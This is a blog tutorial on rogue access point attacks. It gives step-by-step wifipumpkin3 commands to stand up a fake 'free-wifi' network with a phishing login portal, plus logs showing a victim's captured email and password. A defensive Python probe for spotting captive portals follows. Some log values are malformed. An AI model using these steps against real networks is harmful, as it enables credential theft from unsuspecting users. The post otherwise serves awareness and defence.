DEV Community

Grzegorz Piechnik


“Scary” Rogue Access Point attack

When going to McDonald's, a restaurant or even an ordinary coffee shop, we can sometimes take advantage of their open Wi-Fi network. This is especially useful when we plan to stay longer and work on our projects. It also carries quite a few risks. One example is the rogue access point attack, to which this post is dedicated.

What is an access point?

To provide Internet connectivity at home, most of us use a router, which distributes the signal, over a cable or wirelessly, to the network adapters in our computers. The router creates its own home network and assigns individual IP addresses to the devices on it. Depending on the model, a router has different network interfaces.

An access point, on the other hand, is the part of the router (or a separate device) without which we would not be able to connect to the network. It has the same network interfaces as the router: the first allows communication with the Internet via a network cable and the router, the second allows further user devices to connect to the network.

A rogue access point is thus an access point installed on a network without the permission of its owner. An attacker who operates such a fake access point is able to intercept requests, which brings the threat of stealing sensitive user data, among other things.

wifipumpkin3

                            .,'                          
                        .''.'                
                        .' .'                 
            _.ood0Pp._ ,'  `.~ .q?00doo._          
        .od00Pd0000Pdb._. . _:db?000b?000bo.   
     .?000Pd0000Pd0000PdbMb?0000b?000b?0000b.     
    .d0000Pd0000Pd0000Pd0000b?0000b?000b?0000b.      
    d0000Pd0000Pd00000Pd0000b?00000b?0000b?000b.     
    00000Pd0000Pd0000Pd00000b?00000b?0000b?0000b   
    ?0000b?0000b?  WiFiPumpkin3  00Pd0000Pd0000P    
    ?0000b?0000b?0000b?00000Pd00000Pd0000Pd000P     
    `?0000b?0000b?0000b?0000Pd0000Pd0000Pd000P'  
     `?000b?0000b?000b?0000Pd000Pd0000Pd000P     
        `~?00b?000b?000b?000Pd00Pd000Pd00P'    
            `~?0b?0b?000b?0Pd0Pd000PdP~'  

Wifipumpkin3 is a tool that can carry out, among other things, the attack described above. Let's check how.

After installing and running the proxies command inside the tool, we get information about available proxies.

 Proxy        | Active   |   Port | Description
--------------+----------+--------+-------------------------------------------------------
 captiveflask | False    |     80 | Allow block Internet access for users until they o...
 noproxy      | False    |     80 | Runnning without proxy redirect traffic
 pumpkinproxy | True     |   8080 | Transparent proxies that you can use to intercept ...

The tool provides three possible proxy settings. The first ensures that users can only access the Internet once they pass through a login page (where we can try to force the user to enter credentials). The second disables the proxy. The last option is enabled by default and lets us capture traffic and display it in a panel created for this purpose. So let's try using the captiveflask proxy. To do this, use the command:

wp3 > set proxy captiveflask true

After typing proxies again, you will notice that captiveflask has been activated along with the captive portal template DarkLogin.

wp3 > proxies

[*] Available proxies:
======================

 Proxy        | Active   |   Port | Description
--------------+----------+--------+-------------------------------------------------------
 captiveflask | True     |     80 | Allow block Internet access for users until they o...
 noproxy      | False    |     80 | Runnning without proxy redirect traffic
 pumpkinproxy | False    |   8080 | Transparent proxies that you can use to intercept ...



[*] Captive Portal plugins:
===========================

 Name      | Active
-----------+----------
 DarkLogin | True
 FlaskDemo | False
 Login_v4  | False
 loginPage | False

What does this mean for us? That a template named DarkLogin will be used. To set a different template, we will type:

wp3 > set captiveflask.
captiveflask.DarkLogin                          captiveflask.FlaskDemo.ptBr
captiveflask.FlaskDemo                          captiveflask.force_redirect_sucessful_template
captiveflask.FlaskDemo.Default                  captiveflask.loginPage
captiveflask.FlaskDemo.En                       captiveflask.Login_v4

Press Tab to display the possible options. In our example, we choose:

wp3 > set captiveflask.loginPage true

Let's move on to access points. We can see our available, configured access point with the ap command.

wp3 > ap

[*] Settings AccessPoint:
=========================

 BSSID             | SSID           |   Channel | Interface   | Status      | Security
-------------------+----------------+-----------+-------------+-------------+------------
 AC:B6:85:33:16:7C | WiFi Pumpkin 3 |        11 | None        | not Running | false

Let's change its name from WiFi Pumpkin 3 to free-wifi.


wp3 > set ssid free-wifi
wp3 > ap

[*] Settings AccessPoint:
=========================

 BSSID             | SSID      |   Channel | Interface   | Status      | Security
-------------------+-----------+-----------+-------------+-------------+------------
 AC:B6:85:33:16:7C | free-wifi |        11 | None        | not Running | false

As you can see, the interface for our access point is not set. We can check the available interfaces by running the ifconfig command. In our case, we will use the wlo1 interface.

wp3 > set interface wlo1
wp3 > ap

[*] Settings AccessPoint:
=========================

 BSSID             | SSID      |   Channel | Interface   | Status      | Security
-------------------+-----------+-----------+-------------+-------------+------------
 BC:F6:85:03:36:5B | free-wifi |        11 | wlo1        | not Running | false

With the configuration set, we can proceed to expose the access point to the world.

wp3 > start

As you can see, it is now possible to connect to the newly created Wi-Fi network.

[Image: access point attack]

After joining, the user should be taken to the login panel.

[Image: access point attack]

At the same time, the terminal shows the victim's connection to our access point along with its intercepted requests.

[*] 81:15:72:fh:06:86 client join the AP 
 [  pydhcp_server  ] 21:02:24  - SEND to ('0.0.0.0', 68):
::Header::
    op: BOOTREPLY
    hwmac: MAC('81:15:72:fh:06:86')
    flags: 
    hops: 0
    secs: 0
    xid: 105676842
    siaddr: IPv4Address('0.0.0.0')
    giaddr: IPv4Address('0.0.0.0')
    ciaddr: IPv4Address('0.0.0.0')
    yiaddr: IPv4Address('10.0.0.21')
    sname: ''
    file: ''

::Body::
    [X][001] subnet_mask: IPv4Address('255.0.0.0')
    [X][003] router: [IPv4Address('10.0.0.1'), IPv4Address('8.8.8.8')]
    [X][006] domain_name_servers: [IPv4Address('10.0.0.1')]
    [ ][012] hostname: 'DESKTOP-9P879SS'
    [X][051] ip_address_lease_time: 7200
    [-][053] dhcp_message_type: DHCP_ACK
    [X][054] server_identifier: IPv4Address('10.0.0.1')
    [ ][081] client_fqdn: '\x00\x00\x00DESKTOP-9Ph29aS'

 [  captiveflask  ] 21:02:59  - 10.0.0.21 - - [05/Nov/2021 21:02:58] "GET /connecttest.txt HTTP/1.1" 302 -

 [  sniffkin3  ] 21:02:59  - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:02:59  - 10.0.0.21 - - [05/Nov/2021 21:02:59] "GET /connecttest.txt HTTP/1.1" 302 -

 [  sniffkin3  ] 21:02:59  - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:00  - 10.0.0.21 - - [05/Nov/2021 21:03:00] "GET /connecttest.txt HTTP/1.1" 302 -

 [  sniffkin3  ] 21:03:00  - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:00  - 10.0.0.21 - - [05/Nov/2021 21:03:00] "GET /connecttest.txt HTTP/1.1" 302 -

 [  sniffkin3  ] 21:03:00  - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:37  - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET / HTTP/1.1" 302 -

 [  sniffkin3  ] 21:03:37  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/ 
 [  captiveflask  ] 21:03:37  - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 200 -

 [  sniffkin3  ] 21:03:37  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F 
 [  sniffkin3  ] 21:03:38  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/css/bootstrap.min.css 
 [  captiveflask  ] 21:03:38  - 10.0.0.21 - - [05/Nov/2021 21:03:37] "GET /static/css/bootstrap.min.css HTTP/1.1" 200 -
10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/js/jquery-1.11.1.min.js HTTP/1.1" 200 -
10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/js/bootstrap.min.js HTTP/1.1" 200 -

 [  sniffkin3  ] 21:03:38  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/js/jquery-1.11.1.min.js 
 [  sniffkin3  ] 21:03:38  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/js/bootstrap.min.js 
 [  captiveflask  ] 21:03:38  - 10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /static/images/avatar_2x.png HTTP/1.1" 200 -

 [  captiveflask  ] 21:03:38  - 10.0.0.21 - - [05/Nov/2021 21:03:38] "GET /favicon.ico HTTP/1.1" 404 -

 [  sniffkin3  ] 21:03:38  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/static/images/avatar_2x.png 
 [  sniffkin3  ] 21:03:38  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/favicon.ico 
 [  captiveflask  ] 21:03:53  - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -

 [  captiveflask  ] 21:03:53  - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1 
 [  sniffkin3  ] 21:03:53  - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:53  - " 302 -

 [  sniffkin3  ] 21:03:53  - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:53  - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -

 [  sniffkin3  ] 21:03:53  - [ 10.0.0.21 > 13.493.4.13 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:53  - 10.0.0.21 - - [05/Nov/2021 21:03:53] "GET /connecttest.txt HTTP/1.1" 302 -

After the client enters the sensitive data and submits the form, the console shows us:

 [  sniffkin3  ] 21:03:53  - [ 10.0.0.21 > 13.107.4.52 ] GET www.msftconnecttest.com/connecttest.txt 
 [  captiveflask  ] 21:03:55  - {'10.0.0.21': {'login': 'bugspace@bugspace.pl', 'password': 'bugspacepassword'}} 

[*] CaptiveFlask credentials:
=============================

 IP        | Login                | Password
-----------+----------------------+------------------
 10.0.0.21 | bugspace@bugspace.pl | bugspacepassword


 [  sniffkin3  ] 21:03:56  - [ 10.0.0.21 > 10.0.0.1 ] POST 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F 
                     payload: login=bugspace%40bugspace.pl&password=bugspacepassword
                     Username: bugspace%40bugspace.pl
                     Password: bugspacepassword

 [  sniffkin3  ] 21:03:56  - [ 10.0.0.21 > 10.0.0.1 ] POST 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F 
 [  sniffkin3  ] 21:03:56  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/ 
 [  sniffkin3  ] 21:03:56  - [ 10.0.0.21 > 10.0.0.1 ] GET 10.0.0.1/login?orig_url=http%3A%2F%2F10.0.0.1%2F 
 [  captiveflask  ] 21:03:56  - 10.0.0.21 - - [05/Nov/2021 21:03:55] "POST /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 302 -
10.0.0.21 - - [05/Nov/2021 21:03:55] "GET / HTTP/1.1" 302 -
10.0.0.21 - - [05/Nov/2021 21:03:55] "GET /login?orig_url=http%3A%2F%2F10.0.0.1%2F HTTP/1.1" 200 -

Thus, we received a user login and password.
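From the client's side, the one thing the log above makes visible is that the Windows connectivity probe (GET /connecttest.txt) was answered with a 302 to the access point's own login page instead of the genuine response. The following Python script, an added example that is not part of wifipumpkin3 or the original post, repeats that probe with redirects disabled and reports whether the network is interposing a portal; the function and constant names are my own.

```python
import urllib.error
import urllib.request
from urllib.parse import urlsplit

# The same probe Windows NCSI sends, as seen in the sniffkin3 lines above.
PROBE_URL = "http://www.msftconnecttest.com/connecttest.txt"
# Body the genuine endpoint returns with HTTP 200 and no redirect.
EXPECTED_BODY = b"Microsoft Connect Test"
REDIRECTS = {301, 302, 303, 307, 308}


class _KeepRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the 3xx itself is the evidence we want."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def classify_probe(status, location, body):
    """Classify one probe response.

    Returns 'clean' (genuine answer), 'captive_portal' (a 3xx with a
    Location header, which is what captiveflask produced in the log) or
    'tampered' (anything else, e.g. a 200 whose body was rewritten).
    """
    if status == 200 and body.strip() == EXPECTED_BODY:
        return "clean"
    if status in REDIRECTS and location:
        return "captive_portal"
    return "tampered"


def portal_host(location):
    """Host the redirect points at (in the log above: the gateway 10.0.0.1)."""
    return urlsplit(location).hostname


def run_probe(url=PROBE_URL, timeout=5):
    """Send the probe over the current network and classify the answer."""
    opener = urllib.request.build_opener(_KeepRedirect)
    try:
        with opener.open(url, timeout=timeout) as resp:
            return classify_probe(resp.status, resp.headers.get("Location"), resp.read())
    except urllib.error.HTTPError as err:
        # urllib raises for the unfollowed 3xx; the target is in Location.
        return classify_probe(err.code, err.headers.get("Location"), err.read())
    except urllib.error.URLError:
        return "unreachable"


if __name__ == "__main__":
    print(run_probe())
```

A legitimate hotel or café portal produces the same 'captive_portal' result, so the check tells you that something on the network is intercepting your traffic, not who; any credentials typed into that page go to whoever runs the portal.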

Sources

https://github.com/swagkarna/wifi-pumpkin-v3.0
https://www.khanacademy.org/computing/computers-and-internet/xcae6f4a7ff015e7d:online-data-security/xcae6f4a7ff015e7d:cyber-attacks/a/rogue-access-points-mitm-attacks
